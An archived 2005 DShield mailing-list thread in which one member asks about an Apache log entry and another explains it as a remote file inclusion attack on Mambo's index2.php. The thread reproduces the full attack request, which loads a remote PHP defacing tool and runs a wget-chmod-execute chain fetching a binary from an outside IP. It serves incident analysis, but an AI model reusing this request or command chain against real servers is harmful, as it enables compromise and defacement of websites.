[Dshield] Can Someone Decipher This Log Entry?

Meidinger Chris chris.meidinger at badenIT.de
Thu Dec 22 09:51:11 GMT 2005


Hi David,

google tells me that com_content is part of Mambo, whis an open source mini-CMS.

So it looks like a hole in index2.php

<hole> 
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path
</hole> 

which can be used to execute code from a URL

<url>
http://209.136.48.69/cmd.gif
</url>

What is at that URL?
(cmeid at phantom)(285/pts/9)(10:46am:12/22/05)-
(%:~/LIVE-MALWARE)- wget http://209.136.48.69/cmd.gif &> /dev/null
(cmeid at phantom)(286/pts/9)(10:46am:12/22/05)-
(%:~/LIVE-MALWARE)- file cmd.gif
cmd.gif: exported SGML document text
(cmeid at phantom)(287/pts/9)(10:46am:12/22/05)-
(%:~/LIVE-MALWARE)- head cmd.gif
<!--
Defacing Tool 2.0 by r3v3ng4ns
revengans at gmail.com
se for modificar o codigo, por favor, mantenha o nome de seus autores originais
e por favor, entre em contato comigo...

ae galera, serio, tem mta gente fdp q simplismente usa, nao seja soh um sucker do script,
n seja um lammer imbecil, n seja o merda dum script kiddie, n seja um babaca, ajude a melhora-lo tambem!!
-->
<?php
(cmeid at phantom)(288/pts/9)(10:46am:12/22/05)-
(%:~/LIVE-MALWARE)-

So it's a defacing tool, which accepts command parameters:

<parameters>
&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 200 21 "-"
</parameters>

which tell it what to deface and how.

Fun stuff, huh?

Cheers,

Chris

-----Original Message-----
From: list-bounces at lists.dshield.org on behalf of David Cary Hart
Sent: Wed 21-Dec-05 22:53
To: DShield General Discussion List
Subject: [Dshield] Can Someone Decipher This Log Entry?
 
I have about 25 of these today. I've added index2.php to the firewall watcher.
I cannot make sense of this Apache print:

85.190.1.171 - - [21/Dec/2005:16:47:41 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 200 21 "-"

-- 
Our DNSRBL - 
           Eliminate Spam: http://www.TQMcube.com/spam_trap.php
          Multi-RBL Check: http://www.TQMcube.com/rblcheck.php
            Zombie Graphs: http://www.TQMcube.com/zombies.php
              GeoGraphics: http://www.TQMcube.com/origins.php
_________________________________________
Learn about Intrusion Detection in Depth from the comfort of your own couch:
https://www.sans.org/athome/details.php?id=1341&d=1

_______________________________________________
send all posts to list at lists.dshield.org
To change your subscription options (or unsubscribe), see: http://www.dshield.org/mailman/listinfo/list



More information about the list mailing list